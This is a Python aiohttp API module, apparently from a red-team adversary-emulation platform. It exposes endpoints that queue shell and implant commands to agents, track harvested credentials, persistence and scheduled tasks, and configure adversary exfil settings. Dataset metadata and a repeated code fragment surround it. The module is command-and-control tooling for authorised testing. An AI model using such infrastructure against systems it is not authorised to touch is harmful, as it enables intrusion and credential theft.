ws.prepare(request) def write_websocket(data): if not ws.closed: ws.send_bytes(data) else: raise RuntimeError srv = ddp.DDPServer(write_websocket) srv.register_collection("operation", Operation) srv.register_collection("domain", Domain) srv.register_collection("host", Host) srv.register_collection("network", Network) srv.register_collection("rat", Rat) srv.register_collection("observed_rat", ObservedRat) srv.register_collection("observed_host", ObservedHost) srv.register_collection("observed_file", ObservedFile) srv.register_collection("observed_schtask", ObservedSchtask) srv.register_collection("job", Job) srv.register_collection("log", Log) srv.register_collection("adversary", Adversary) srv.register_collection("step", CodedStep) srv.register_collection("active_connection", ActiveConnection) srv.register_collection("agent", Agent) srv.register_collection("attack_technique", AttackTechnique) srv.register_collection("attack_tactic", AttackTactic) srv.register_collection("attack_list", AttackList) srv.register_collection("attack_group", AttackGroup) srv.register_collection("setting", Setting) srv.register_collection("artifactlist", Artifactlist) request.app['websockets'].append(ws) try: async for msg in ws: if msg.type == aiohttp.WSMsgType.TEXT or msg.type == aiohttp.WSMsgType.BINARY: srv.parse_message(msg.data) elif msg.type == aiohttp.WSMsgType.ERROR: log.debug('ws connection closed with exception {}'.format(ws.exception())) finally: request.app['websockets'].remove(ws) log.debug('websocket connection closed') return ws def init(app): # setup the generated endpoints for method, uri, func in routes: app.router.add_route(method, uri, func)
37.889788
137
0.621221
import asyncio from datetime import datetime, timezone from functools import wraps import traceback import inspect import logging import ujson as json_module import hashlib import yaml from aiohttp import web import aiohttp import mongoengine import os from .engine.objects import Operation, Network, Domain, Log, ObservedHost, TechniqueMapping, Job, Rat, Host, \ ObservedRat, Adversary, CodedStep, ActiveConnection, Agent, AttackTechnique, AttackTactic, SiteUser, Setting, \ Opcodes, Artifactlist, ObservedFile, AttackList, JobException, ObservedSchtask, ObservedProcess, AttackGroup from .engine.objects import ObservedDomain, ObservedOSVersion, ObservedUser, ObservedShare, ObservedCredential, \ ObservedService, ObservedTimeDelta, ObservedRegKey, ObservedPersistence from . import authentication as auth from .engine.database import native_types from . import ddp from . import attack from . import util from . import interface from . import extern log = logging.getLogger(__name__) routes = [] def api(uri, methods, objects=None, get=None, auth_group=None, headers=None): if objects is None: objects = {} if get is None: get = {} if auth_group is None: auth_group = [] if headers is None: headers = {} def decorator(f): @wraps(f) async def decorated(req, token, url_match): kwargs = {} for name, _class in objects.items(): if name in url_match: try: kwargs[name] = _class.objects.with_id(url_match[name]) if kwargs[name] is None: return web.HTTPBadRequest() except (mongoengine.errors.ValidationError, ): return web.HTTPBadRequest() trueified = {k: True if v == '' else v for k, v in req.GET.items()} for k, v in get.items(): kwargs[k] = trueified.get(k, v) sig = inspect.signature(f) if 'token' in sig.parameters: kwargs['token'] = token results = await f(req, **kwargs) if isinstance(results, web.StreamResponse): return results else: json = json_module.dumps(native_types(results), sort_keys=True, indent=4) return web.Response(text=json, content_type='application/json', headers=headers) 
async def entrypoint(req): host = None try: token = auth.Token(req.cookies.get('AUTH')) l = [g for g in auth_group if token.in_group(g)] if len(l) == 0: raise auth.NotAuthorized() peername = req.transport.get_extra_info('peername') if peername is not None: host_ip, port = peername if req.host: local_ip = req.host.split(":")[0] if local_ip == "localhost": local_ip = "127.0.0.1" else: local_ip = "127.0.0.1" token_host = None if token.in_group('agent'): agent = Agent.objects.with_id(token.session_info['_id']) if agent is None: raise auth.NotAuthorized agent.modify(**{'alive': True}) token_host = agent.host host = ActiveConnection.objects(ip=host_ip, host=token_host, local_ip=local_ip).first() if host is None: host = ActiveConnection(ip=host_ip, host=token_host, local_ip=local_ip, connections=0).save() host.update(inc__connections=1) resp = await decorated(req, token, req.match_info) return resp except auth.NotAuthorized: return web.HTTPForbidden() except Exception: traceback.print_exc() results = {'error': 'exception in ' + f.__name__} output = json_module.dumps(results, sort_keys=True, indent=4) return web.HTTPInternalServerError(text=output, content_type='application/json') finally: if host: host.update(dec__connections=1) for method in methods: routes.append((method, uri, entrypoint)) return decorated return decorator def websocket(uri, auth_group=None): if auth_group is None: auth_group = [] def decorator(f): @wraps(f) async def entrypoint(req): try: token = auth.Token(req.cookies.get('AUTH')) l = [g for g in auth_group if token.in_group(g)] if len(l) == 0: raise auth.NotAuthorized() return await f(req) except auth.NotAuthorized: return web.HTTPForbidden() except Exception: traceback.print_exc() results = {'error': 'exception in ' + f.__name__} output = json_module.dumps(results, sort_keys=True, indent=4) return web.HTTPInternalServerError(text=output, content_type='application/json') routes.append(('GET', uri, entrypoint)) return entrypoint return decorator 
@api('/api/jobs', methods=['GET', 'POST'], get={'status': None, 'wait': False}, auth_group=['human', 'agent']) async def query_jobs(request, token, status, wait): if request.method == 'GET': query = {} if status: query['status'] = status if token.in_group('agent'): agent = Agent.objects.with_id(token.session_info['_id']) if not agent: raise auth.NotAuthorized() query.update({'agent': agent.id}) jobs = list(Job.objects(**query)) if not len(jobs) and wait is not False: try: jobs = [(await Job.wait_next(query))] except asyncio.CancelledError: return else: jobs = list(Job.objects(**query)) if not len(jobs) and wait is not False: jobs = [(await Job.wait_next(query))] return jobs elif request.method == 'POST': token.require_group('human') json = await request.json() return Job(**json).save().id @api('/api/jobs/{job}', methods=['GET', 'PUT', 'DELETE'], objects={'job': Job}, auth_group=['human', 'agent']) async def query_job(request, token, job): if request.method == 'GET': if token.in_group('agent'): if job['status'] in ("created", "pending") and str(job.agent.id) == token.session_info['_id']: return job else: raise auth.NotAuthorized() else: return job elif request.method == 'PUT': if token.in_group('agent'): if job.status in ("created", "pending") and str(job.agent.id) == token.session_info['_id']: json = await request.json() if 'result' in json['action']: job['action']['result'] = json['action']['result'] if 'error' in json['action']: job['action']['error'] = json['action']['error'] if 'exception' in json['action']: job['action']['exception'] = json['action']['exception'] job['status'] = json.get('status', job.status) if job['status'] == "failed" and 'error' in job['action'] and job['action']['error'] == "no client": interface.get_clients(job.agent.host) try: iv_name = job['action']["rats"]["args"][0] iv = Rat.objects(agent=job.agent, name=iv_name) iv.modify(**{'active': False}) except KeyError: log.warning("Could not find rat to remove for failed job") return 
job.save() else: raise auth.NotAuthorized() else: json = await request.json() if json['create_time']: json['create_time'] = datetime.strptime(json['create_time'], "%Y-%m-%dT%H:%M:%S.%f") return job.save() elif request.method == 'DELETE': token.require_group('human') return job.delete() @api('/api/clients', methods=['POST'], auth_group=['agent']) async def query_clients(request, token): json = await request.json() agen = Agent.objects.with_id(token.session_info['_id']) complete_names = {iv.name: iv for iv in Rat.objects(host=agen.host)} known_names = {} for name, element in complete_names.items(): if element.active: known_names[name] = element active = {x['pid']: x for x in json} for name, iv in known_names.items(): if name not in active: iv.modify(**{'active': False}) else: a = active.pop(name) iv.update(**{'elevated': a['elevated'], 'executable': a['executable_path']}) for name in active: Rat(**{'agent': agen, 'host': agen.host, 'name': name, 'elevated': active[name]['elevated'], 'executable': active[name]['executable_path'], 'username': active[name]['username'].lower(), 'active': True}).save() return None @api('/api/networks', methods=['GET', 'POST'], auth_group=['human']) async def query_networks(request): if request.method == 'GET': return Network.objects elif request.method == 'POST': json = await request.json() network = Network(**json).save() return network.id @api('/api/networks/{network}', methods=['GET', 'DELETE'], objects={'network': Network}, auth_group=['human']) async def query_network(request, network): if request.method == 'GET': return network elif request.method == 'DELETE': network.delete() @api('/api/heartbeat', methods=['GET'], auth_group=['agent']) async def agent_check_in(request, token): agen = Agent.objects.with_id(token.session_info['_id']) agen.modify(**{'check_in': datetime.now(timezone.utc), 'alive': True}) return True @api('/api/hosts', methods=['GET'], auth_group=['human']) async def query_hosts(request): return Host.objects 
# --- Domain / rat / operation / adversary / admin REST handlers -----------

@api('/api/domains', methods=['GET'], auth_group=['human'])
async def query_domains(request):
    # List all Domain documents.
    return Domain.objects


@api('/api/domains/{domain}', methods=['GET'], objects={'domain': Domain}, auth_group=['human'])
async def query_domain(request, domain):
    # Single Domain, resolved by the @api objects= machinery.
    return domain


@api('/api/domains/{domain}/hosts', methods=['GET'], objects={'domain': Domain}, auth_group=['human'])
async def query_domainhosts(request, domain):
    # Hosts belonging to a domain.
    return Host.objects(domain=domain)


@api('/api/networks/{network}/hosts', methods=['GET'], objects={'network': Network}, auth_group=['human'])
async def query_networkhosts(request, network):
    return network.hosts


@api('/api/networks/{network}/hosts/{host}', methods=['GET', 'PUT', 'DELETE'],
     objects={'network': Network, 'host': Host}, auth_group=['human'])
async def query_networkhosthosts(request, network, host):
    # GET a host, or PUT/DELETE to add/remove it from the network host list.
    if request.method == 'GET':
        return host
    elif request.method == 'PUT':
        network.modify(push__hosts=host)
    elif request.method == 'DELETE':
        network.modify(pull__hosts=host)


@api('/api/hosts/{host}/commands', methods=['GET', 'POST'], objects={'host': Host}, auth_group=['human'])
async def query_commands(request, host):
    """List shell-command jobs for a host, or POST a new command line."""
    if request.method == 'GET':
        if 'hostname' in request.GET:
            # ?hostname= overrides the path's host id as the filter.
            hosts = Host.objects(hostname=request.GET['hostname'])
            return [x.host_command_result() for x in Job.objects(host__in=hosts)]
        else:
            return [x.host_command_result() for x in Job.objects(host=host)]
    elif request.method == 'POST':
        json = await request.json()
        return interface.agent_shell_command(host, json['command_line']).id


@api('/api/hosts/{host}/commands/{job}', methods=['GET'], get={'wait': False},
     objects={'host': Host, 'job': Job}, auth_group=['human'])
async def query_command(request, wait, host, job):
    # Optionally block until the job finishes before returning its result.
    if wait is not False:
        try:
            await job.wait_till_completed()
        except JobException as e:
            log.warning(e.args)
    return job.host_command_result()


@api('/api/rats', methods=['GET'], auth_group=['human'])
async def query_ivs(request):
    # Only the 'hostname' query parameter is honored as a filter.
    query = {k: v for k, v in request.GET.items() if k == 'hostname'}
    return Rat.objects(**query)


@api('/api/rats/{rat}', methods=['GET'], objects={'rat': Rat}, auth_group=['human'])
async def query_iv(rat):
    # NOTE(review): unlike sibling handlers this signature omits `request`;
    # confirm the @api decorator tolerates that arity.
    return rat


@api('/api/rats/{rat}/commands', methods=['GET', 'POST'], objects={'rat': Rat}, auth_group=['human'])
async def query_ivcommands(request, rat):
    """List a rat's command jobs, or POST a new rat command."""
    if request.method == 'GET':
        return [x.rat_command_result() for x in Job.objects(agent=rat.agent)]
    elif request.method == 'POST':
        json = await request.json()
        return Job.create_rat_command(rat, json["function"], **json["parameters"]).id


@api('/api/rats/{rat}/commands/{job}', methods=['GET'], get={'wait': False},
     objects={'rat': Rat, 'job': Job}, auth_group=['human'])
async def query_ivcommand(request, wait, rat, job):
    # Optionally block until completion, then return the rat-level result.
    if wait is not False:
        try:
            await job.wait_till_completed()
        except JobException as e:
            log.warning(e.args)
    return job.rat_result()


@api('/api/operations', methods=['GET'], auth_group=['human'])
async def query_operations(request):
    return Operation.objects


@api('/api/opcodes', methods=['GET'], auth_group=['human'])
async def get_opcodes(request):
    return Opcodes.arguments


@api('/api/networks/{network}/operations', methods=['GET', 'POST'], objects={'network': Network}, auth_group=['human'])
async def query_perations(request, network):
    """List or create operations on a network.

    NOTE(review): function name has a typo ("perations"); the route string
    is what matters for dispatch, so renaming is cosmetic-only.
    """
    if request.method == 'GET':
        return list(Operation.objects(network=network))
    elif request.method == 'POST':
        json = await request.json()
        # An 'existing' start type requires a rat to start from.
        if json['start_type'] == 'existing' and 'start_rat' not in json:
            return None
        json['network'] = network
        json['status'] = 'start'
        json['status_state'] = ''
        json['log'] = Log().save()
        # Snapshot the adversary's step names into the operation.
        adversary = Adversary.objects.with_id(json['adversary'])
        json['steps'] = [x.name for x in adversary.steps]
        operation = Operation(**json).save()
        return operation.id


@api('/api/networks/{network}/operations/{operation}', methods=['GET', 'PUT', 'DELETE', 'PATCH'],
     get={'wait': False}, objects={'network': Network, 'operation': Operation}, auth_group=['human'])
async def query_operation(request, network, operation, wait):
    """CRUD + long-poll on a single operation.

    GET with ``?wait=<json query>`` blocks until the operation matches the
    given query (e.g. a target status) before returning it.
    """
    if request.method == 'GET':
        if wait:
            wait = json_module.loads(wait)
            wait["id"] = operation.id
            log.info("Wait: {}".format(wait))
            new = list(Operation.objects(**wait))
            if len(new) == 0:
                # Not matching yet: subscribe on the document until it does.
                del wait["id"]
                new = [await operation.wait(wait)]
            return new[0]
        return operation
    elif request.method == 'PUT':
        json = await request.json()
        json['network_id'] = network.id
        json['hosts'] = network.hosts
        return operation.update(**json)
    elif request.method == 'DELETE':
        return operation.delete()
    elif request.method == 'PATCH':
        # Raw $set so partial updates don't clobber unlisted fields.
        json = await request.json()
        operation.update(__raw__={'$set': json})


@api('/api/agents', methods=['GET'], auth_group=['human'])
async def query_agents(request):
    return Agent.objects


@api('/api/logs', methods=['GET'], auth_group=['human'])
async def query_logs(request):
    return Log.objects


@api('/api/logs/{log}', methods=['GET'], objects={'log': Log}, auth_group=['human'])
async def query_log(request, log):
    return log


@api('/api/agents/{agent}', methods=['GET'], objects={'agent': Agent}, auth_group=['human'])
async def query_agent(request, agent):
    return agent


@api('/api/adversaries', methods=['GET', 'POST'], auth_group=['human'])
async def query_adversaries(request):
    """List adversaries, or create one from posted artifactlist/step ids."""
    if request.method == 'GET':
        return Adversary.objects
    elif request.method == 'POST':
        json = await request.json()
        # Dereference ids into documents before constructing the Adversary.
        json['artifactlists'] = [Artifactlist.objects.with_id(x) for x in json['artifactlists']]
        json['steps'] = [CodedStep.objects.with_id(x) for x in json['steps']]
        return Adversary(**json).save().id


@api('/api/adversaries/{adversary}', methods=['GET', 'PUT', 'DELETE'], objects={'adversary': Adversary}, auth_group=['human'])
async def query_adversary(request, adversary):
    """Read, update (copy-on-write for protected ones) or delete an adversary."""
    if request.method == 'GET':
        return adversary
    elif request.method == 'PUT':
        if (adversary.protected):
            # Built-in adversaries are immutable: clone, then update the clone.
            new_adv = {}
            new_adv['name'] = adversary['name']
            new_adv['steps'] = adversary['steps']
            new_adv['exfil_method'] = adversary['exfil_method']
            new_adv['exfil_port'] = adversary['exfil_port']
            new_adv['exfil_address'] = adversary['exfil_address']
            new_adv['artifactlists'] = adversary['artifactlists']
            adversary = Adversary(**new_adv).save()
        json = await request.json()
        json['artifactlists'] = [Artifactlist.objects.with_id(x) for x in json['artifactlists']]
        json['steps'] = [CodedStep.objects.with_id(x) for x in json['steps']]
        adversary.update(**json)
        return adversary.id
    elif request.method == 'DELETE':
        # Protected (built-in) adversaries cannot be deleted.
        if not adversary.protected:
            return adversary.delete()


@api('/api/step', methods=['GET'], auth_group=['human'])
async def query_step(request):
    # NOTE(review): re-defined later in this module with the same name and
    # route — confirm the duplicate registration is intended.
    return CodedStep.objects


@api('/api/site_user', methods=['GET', 'POST'], auth_group=['admin'])
async def query_siteusers(request):
    """List site users (no secrets) or register a new one."""
    if request.method == 'GET':
        return SiteUser.objects.only('username', 'groups', 'email', 'last_login')
    elif request.method == 'POST':
        json = await request.json()
        username = json['username']
        email = json.get('email', '')
        password = json.get('password', None)
        groups = ['human']
        if json.get('admin', False):
            groups.append('admin')
        return auth.register_user(username, groups, password=password, email=email).id


@api('/api/site_user/{user}', methods=['GET', 'DELETE'], objects={'user': SiteUser}, auth_group=['admin'])
async def query_siteuser(request, token, user):
    if request.method == 'GET':
        return user.only('username', 'groups', 'email', 'last_login')
    elif request.method == 'DELETE':
        # An admin may not delete their own account.
        if token.session_info['_id'] != str(user.id):
            return user.delete()


@api('/api/site_user/{user}/admin', methods=['PUT', 'DELETE'], objects={'user': SiteUser}, auth_group=['admin'])
async def query_siteuser_admin(request, token, user):
    """Grant or revoke admin group membership."""
    if request.method == 'PUT':
        user.modify(push__groups='admin')
    elif request.method == 'DELETE':
        # Keep at least one admin, and never allow self-demotion.
        if SiteUser.objects(groups='admin').count() > 1 and token.session_info['_id'] != str(user.id):
            user.modify(pull__groups='admin')


@api('/api/site_user/{user}/password', methods=['POST'], objects={'user': SiteUser}, auth_group=['admin', 'human'])
async def query_siteuser_password(request, token, user):
    # Admins may reset anyone's password; a plain human only their own.
    json = await request.json()
    if 'password' in json:
        if token.in_group('admin') or token.session_info['_id'] == str(user.id):
            auth.user_change_password(user, json['password'])


@api('/api/site_user/{user}/email', methods=['POST'], objects={'user': SiteUser}, auth_group=['admin'])
async def query_siteuser_email(request, user):
    json = await request.json()
    if 'email' in json:
        user.update(email=json['email'])


@api('/api/save_file', methods=['POST'], auth_group=['admin'])
async def save_file(request):
    # Persist an edited file, encrypted at rest; directory entries ("[-d-]")
    # and unresolvable paths are refused silently.
    json = await request.json()
    if 'edited' in json and 'file' in json:
        file_path = util.get_path(json['file'])
        if json['file'].startswith("[-d-]") or file_path is None:
            return
        core = util.encrypt_file(json['edited'])
        with open(file_path, 'wb') as handle:
            core.tofile(handle)


@api('/api/list_file', methods=['GET'], auth_group=['admin'])
async def list_files(request):
    return util.list_files()


@api('/api/load_file', methods=['POST'], auth_group=['admin'])
async def load_file(request):
    # Return decrypted file contents; '[m]' marker paths are returned verbatim.
    json = await request.json()
    if 'file' in json:
        file_path = util.get_path(json['file'])
        if json['file'].startswith("[-d-]") or json['file'] == '' or file_path is None:
            return
        if file_path.startswith('[m]'):
            return file_path
        with open(file_path, 'rb') as handle:
            data = handle.read()
        return util.decrypt_file(data)


@api('/api/load_psexec', methods=['GET'], auth_group=['admin'])
async def load_psexec(request):
    # Refresh the bundled psexec binary and record when it happened.
    extern.load_psexec()
    Setting.objects.first().update(last_psexec_update=util.tz_utcnow())


@api('/api/load_attack', methods=['GET'], auth_group=['admin'])
async def load_attack(request):
    # Re-import ATT&CK data and record when it happened.
    attack.refresh_attack()
    Setting.objects.first().update(last_attack_update=util.tz_utcnow())


@api('/api/update_depth', methods=['POST'], auth_group=['admin'])
async def update_recursion_limit(request):
    json = await request.json()
    if 'new_value' in json:
        Setting.objects.first().modify(recursion_limit=json['new_value'])


@api('/api/group_mimic', methods=['GET'], auth_group=['admin', 'human'])
async def group_coverage(request):
    """Report, per ATT&CK group, whether every technique it uses is covered
    by at least one coded step's mapping (i.e. the group can be emulated)."""
    temp_list = []
    core = {}
    # Collect every technique any coded step is mapped to.
    for step in CodedStep.objects:
        for mapping in step.mapping:
            temp_list.append(mapping.technique)
    groups = AttackGroup.objects
    for entry in groups:
        temp = {}
        breakdown = {}
        decision = []
        for tech in entry.techniques:
            temp[tech.name] = (tech in temp_list)
            decision.append(tech in temp_list)
        breakdown['techniques'] = temp
        # Require full coverage AND more than two techniques to claim emulation.
        if (False not in decision) and (len(decision) > 2):
            breakdown['conclusion'] = 'Can Fully Emulate'
        else:
            breakdown['conclusion'] = 'Can Not Fully Emulate'
        core[entry.name] = breakdown
    return core


@api('/api/steps/{step}/mapping', methods=['POST', 'DELETE'], objects={'step': CodedStep}, auth_group=['human'])
async def post_step_mapping(request, step):
    """Attach (POST) or detach (DELETE) technique/tactic mappings on a step."""
    if request.method == 'POST':
        json = await request.json()
        if 'tactics' not in json or 'technique' not in json:
            return
        tactics = json['tactics']
        technique = json['technique']
        try:
            tech = AttackTechnique.objects.with_id(technique)
            for tactic in tactics:
                tac = AttackTactic.objects.with_id(tactic)
                step.modify(push__mapping=TechniqueMapping(technique=tech, tactic=tac))
        except (TypeError, mongoengine.errors.ValidationError):
            # Bad ids: best-effort API, ignore silently.
            return
    elif request.method == 'DELETE':
        json = await request.json()
        if 'tactic' not in json or 'technique' not in json:
            return
        tactic = json['tactic']
        technique = json['technique']
        try:
            tech = AttackTechnique.objects.with_id(technique)
            tac = AttackTactic.objects.with_id(tactic)
            for mapping in step.mapping:
                if mapping.tactic == tac and mapping.technique == tech:
                    step.modify(pull__mapping=mapping)
        except (TypeError, mongoengine.errors.ValidationError):
            return


@api('/api/steps/{step}/mapping/load_defaults', methods=['GET'], objects={'step': CodedStep}, auth_group=['human'])
async def get_step_mapping_defaults(request, step):
    # Reset a step's mapping to its built-in default.
    step.update(mapping=step.default_mapping)


@api('/api/attack_download.json', methods=['GET'], auth_group=['human'],
     headers={'Content-Disposition': 'attachment'})
async def get_all_attack_stuff(request):
    """Dump all ATT&CK techniques and tactics as a downloadable JSON blob."""
    try:
        techniques = []
        for technique in AttackTechnique.objects:
            this_technique = technique.to_dict()
            this_technique['tactics'] = [x.name for x in technique.tactics]
            del this_technique['_id']  # Mongo ObjectIds are not JSON friendly
            techniques.append(this_technique)
        tactics = [x.to_dict() for x in AttackTactic.objects]
        for tactic in tactics:
            del tactic["_id"]
        return {"techniques": techniques, "tactics": tactics}
    except (TypeError, mongoengine.errors.ValidationError):
        return


@api('/api/generated/{function}', methods=["POST"], auth_group=['admin'])
async def generated_dispatcher(request):
    # Dynamically dispatch to interface.<function>(**json) and await the job.
    dispatched_function = request.match_info['function']
    request_json = await request.json()
    job = getattr(interface, dispatched_function)(**request_json)
    try:
        await job.wait_till_completed()
        return job.action['result']
    except JobException:
        return job.action['error']


@api('/api/artifactlists', methods=['GET', 'POST'], auth_group=['human'])
async def get_artifactlists(request):
    """List artifact lists, or create one from a JSON or YAML payload."""
    if request.method == 'GET':
        return Artifactlist.objects
    elif request.method == 'POST':
        if request.content_type == "application/json":
            content = await request.json()
        elif request.content_type == "text/x-yaml":
            try:
                content = format_yaml(await request.text())
            except (yaml.scanner.ScannerError, yaml.parser.ParserError):
                return web.Response(status=400, text="The yaml was not properly formatted")
        else:
            return web.Response(status=400)
        try:
            return Artifactlist(**content).save().id
        except (mongoengine.errors.FieldDoesNotExist, mongoengine.errors.ValidationError) as e:
            return web.Response(status=400, text=str(e))


@api('/api/artifactlists/{artifactlist}', methods=['GET', 'PUT', 'DELETE'],
     objects={'artifactlist': Artifactlist}, auth_group=['human'])
async def query_artifactlist(request, artifactlist):
    """Read, replace (JSON or YAML body) or delete an artifact list."""
    if request.method == 'GET':
        return artifactlist
    elif request.method == 'PUT':
        if request.content_type == "application/json":
            content = await request.json()
        elif request.content_type == "text/x-yaml":
            try:
                content = format_yaml(await request.text())
            except (yaml.scanner.ScannerError, yaml.parser.ParserError):
                return web.Response(status=400, text="The yaml was not properly formatted")
        else:
            return web.Response(status=400)
        try:
            artifactlist.update(**content)
            return artifactlist.id
        except (mongoengine.errors.FieldDoesNotExist, mongoengine.errors.ValidationError) as e:
            return web.Response(status=400, text=str(e))
    elif request.method == 'DELETE':
        return artifactlist.delete()


@api('/api/parse_artifactlist', methods=['POST'], auth_group=['human'])
async def get_parse_artifactlist(request):
    # Validate a YAML artifact list without saving it; 400 with details on error.
    try:
        parsed = format_yaml(await request.text())
        Artifactlist(**parsed)
        return parsed
    except (yaml.scanner.ScannerError, yaml.parser.ParserError) as e:
        return web.Response(status=400, text="The yaml was not properly formatted: \n" + str(e.problem_mark) + '\n ' + str(e.problem))
    except (mongoengine.errors.FieldDoesNotExist, mongoengine.errors.ValidationError) as e:
        return web.Response(status=400, text=str(e))


def format_yaml(yaml_content):
    """Parse YAML text and normalize ``[None]`` singleton lists to ``[]``.

    NOTE(review): ``yaml.load`` without an explicit Loader can construct
    arbitrary Python objects from the document. Callers are authenticated,
    but ``yaml.safe_load`` would be the safer choice — confirm and switch.
    """
    parsed = yaml.load(yaml_content)
    cleaned = {}
    for k, v in parsed.items():
        if isinstance(v, list) and len(v) == 1 and v[0] is None:
            cleaned[k] = []
        else:
            cleaned[k] = v
    return cleaned


@api('/api/bsf/{log}', methods=['GET'], objects={'log': Log}, auth_group=['human'],
     headers={'Content-Disposition': 'attachment; filename=\"bsf.json\"'})
async def query_bsf(request, log):
    # Download a log's BSF event stream as an attachment.
    return log["event_stream"]


@api('/api/observed/credentials', methods=['GET'], auth_group=['human'])
async def query_credentials(request):
    return ObservedCredential.objects


@api('/api/observed/credentials/{credential}', methods=['GET'], objects={'credential': ObservedCredential}, auth_group=['human'])
async def query_credential(request, token, credential):
    return credential


@api('/api/observed/users', methods=['GET'], auth_group=['human'])
async def query_users(request):
    return ObservedUser.objects


@api('/api/observed/users/{user}', methods=['GET'], objects={'user': ObservedUser}, auth_group=['human'])
async def query_user(request, token, user):
    return user
@api('/api/observed/shares', methods=['GET'], auth_group=['human']) async def query_shares(request): return ObservedShare.objects @api('/api/observed/shares/{share}', methods=['GET'], objects={'share': ObservedShare}, auth_group=['human']) async def query_share(request, token, share): return share @api('/api/observed/files', methods=['GET'], auth_group=['human']) async def query_files(request): return ObservedFile.objects @api('/api/observed/files/{file}', methods=['GET'], objects={'file': ObservedFile}, auth_group=['human']) async def query_file(request, token, file): return file @api('/api/observed/domains', methods=['GET'], auth_group=['human']) async def query_domains(request): return ObservedDomain.objects @api('/api/observed/domains/{domain}', methods=['GET'], objects={'domain': ObservedDomain}, auth_group=['human']) async def query_domain(request, token, domain): return domain @api('/api/observed/os_versions', methods=['GET'], auth_group=['human']) async def query_os_versions(request): return ObservedOsversion.objects @api('/api/observed/os_versions/{os_version}', methods=['GET'], objects={'os_version': ObservedOSVersion}, auth_group=['human']) async def query_os_version(request, token, os_version): return os_version @api('/api/observed/hosts', methods=['GET'], auth_group=['human']) async def query_hosts(request): return ObservedHost.objects @api('/api/observed/hosts/{host}', methods=['GET'], objects={'host': ObservedHost}, auth_group=['human']) async def query_host(request, token, host): return host @api('/api/observed/schtasks', methods=['GET'], auth_group=['human']) async def query_schtasks(request): return ObservedSchtask.objects @api('/api/observed/schtasks/{schtask}', methods=['GET'], objects={'schtask': ObservedSchtask}, auth_group=['human']) async def query_schtask(request, token, schtask): return schtask @api('/api/observed/services', methods=['GET'], auth_group=['human']) async def query_timedeltas(request): return ObservedService.objects 
@api('/api/observed/services/{service}', methods=['GET'], objects={'service': ObservedService}, auth_group=['human'])
async def query_timedelta(request, token, service):
    # NOTE(review): misnamed — serves a single observed service, not a
    # timedelta; route is unaffected.
    return service


@api('/api/observed/timedeltas', methods=['GET'], auth_group=['human'])
async def query_timedeltas(request):
    return ObservedTimeDelta.objects


@api('/api/observed/timedeltas/{timedelta}', methods=['GET'], objects={'timedelta': ObservedTimeDelta}, auth_group=['human'])
async def query_timedelta(request, token, timedelta):
    return timedelta


@api('/api/observed/rats', methods=['GET'], auth_group=['human'])
async def query_rats(request):
    return ObservedRat.objects


@api('/api/observed/rats/{rat}', methods=['GET'], objects={'rat': ObservedRat}, auth_group=['human'])
async def query_rat(request, token, rat):
    return rat


@api('/api/observed/registry_keys', methods=['GET'], auth_group=['human'])
async def query_registry_keys(request):
    return ObservedRegKey.objects


@api('/api/observed/registry_keys/{registry_key}', methods=['GET'], objects={'registry_key': ObservedRegKey}, auth_group=['human'])
async def query_regkey(request, token, registry_key):
    return registry_key


@api('/api/observed/persistence', methods=['GET'], auth_group=['human'])
async def query_persistence_all(request):
    return ObservedPersistence.objects


@api('/api/observed/persistence/{persistence}', methods=['GET'], objects={'persistence': ObservedPersistence}, auth_group=['human'])
async def query_persistence(request, token, persistence):
    return persistence


@api('/api/observed/processes', methods=['GET'], auth_group=['human'])
async def query_processes(request):
    return ObservedProcess.objects


@api('/api/observed/processes/{process}', methods=['GET'], objects={'process': ObservedProcess}, auth_group=['human'])
async def query_process(request, token, process):
    return process


@api('/api/step', methods=['GET'], auth_group=['human'])
async def query_step(request):
    # NOTE(review): duplicate of the earlier /api/step handler — confirm the
    # route table tolerates a second registration of the same route.
    return CodedStep.objects


@websocket('/websocket', auth_group=["human"])
async def wb_operation(request):
    """DDP-over-websocket feed publishing live collection updates to the UI.

    Registers every UI-visible collection with a DDPServer whose sink writes
    straight to this websocket, then pumps incoming client messages into the
    DDP parser until the connection closes.
    """
    ws = web.WebSocketResponse()
    await ws.prepare(request)

    def write_websocket(data):
        # DDP sink; raising when closed tears down the server's subscription.
        if not ws.closed:
            ws.send_bytes(data)
        else:
            raise RuntimeError

    srv = ddp.DDPServer(write_websocket)
    srv.register_collection("operation", Operation)
    srv.register_collection("domain", Domain)
    srv.register_collection("host", Host)
    srv.register_collection("network", Network)
    srv.register_collection("rat", Rat)
    srv.register_collection("observed_rat", ObservedRat)
    srv.register_collection("observed_host", ObservedHost)
    srv.register_collection("observed_file", ObservedFile)
    srv.register_collection("observed_schtask", ObservedSchtask)
    srv.register_collection("job", Job)
    srv.register_collection("log", Log)
    srv.register_collection("adversary", Adversary)
    srv.register_collection("step", CodedStep)
    srv.register_collection("active_connection", ActiveConnection)
    srv.register_collection("agent", Agent)
    srv.register_collection("attack_technique", AttackTechnique)
    srv.register_collection("attack_tactic", AttackTactic)
    srv.register_collection("attack_list", AttackList)
    srv.register_collection("attack_group", AttackGroup)
    srv.register_collection("setting", Setting)
    srv.register_collection("artifactlist", Artifactlist)

    # Track the socket so the app can close it on shutdown.
    request.app['websockets'].append(ws)
    try:
        async for msg in ws:
            if msg.type == aiohttp.WSMsgType.TEXT or msg.type == aiohttp.WSMsgType.BINARY:
                srv.parse_message(msg.data)
            elif msg.type == aiohttp.WSMsgType.ERROR:
                log.debug('ws connection closed with exception {}'.format(ws.exception()))
    finally:
        request.app['websockets'].remove(ws)
    log.debug('websocket connection closed')
    return ws


def init(app):
    # Register every collected (method, uri, handler) route with aiohttp.
    for method, uri, func in routes:
        app.router.add_route(method, uri, func)
true
true